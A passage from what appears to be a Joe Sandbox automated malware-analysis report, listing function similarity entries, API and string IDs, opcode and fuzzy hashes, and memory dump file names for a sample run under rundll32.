                                • API ID: AddressProc$LibraryLoad
                                • String ID: 62 $662
                                • API String ID: 2238633743-980518382
                                • Opcode ID: 48cd3dc5dbe79548c78c3c476827d8e2c43b836f350b0e5477a016c5a382e463
                                • Instruction ID: 0e9f889a9c7703fea28eae440d8edf1887b3426929f3d104db7ca2830befe457
                                • Opcode Fuzzy Hash: 48cd3dc5dbe79548c78c3c476827d8e2c43b836f350b0e5477a016c5a382e463
                                • Instruction Fuzzy Hash: AEB18C776186C58BD365CF24E484BDEBBA8F788788F004125EB8957B58DB38EA54CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F0CF8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: FileHandleType
                                • String ID: @
                                • API String ID: 3000768030-2766056989
                                • Opcode ID: 030a26946847c2795ed0f47b31f85d15f36678cd1225752ab7634676368a263a
                                • Instruction ID: 6415c3513bfa0acc29d9b14b9bef021f32f128830bf2c6f512498d681071529e
                                • Opcode Fuzzy Hash: 030a26946847c2795ed0f47b31f85d15f36678cd1225752ab7634676368a263a
                                • Instruction Fuzzy Hash: B621F922A08F6A42FB64CB259D9013826D5EF45778F240375D6AE277D4CE3DE891D310
                                Uniqueness

                                Uniqueness Score: -1.00%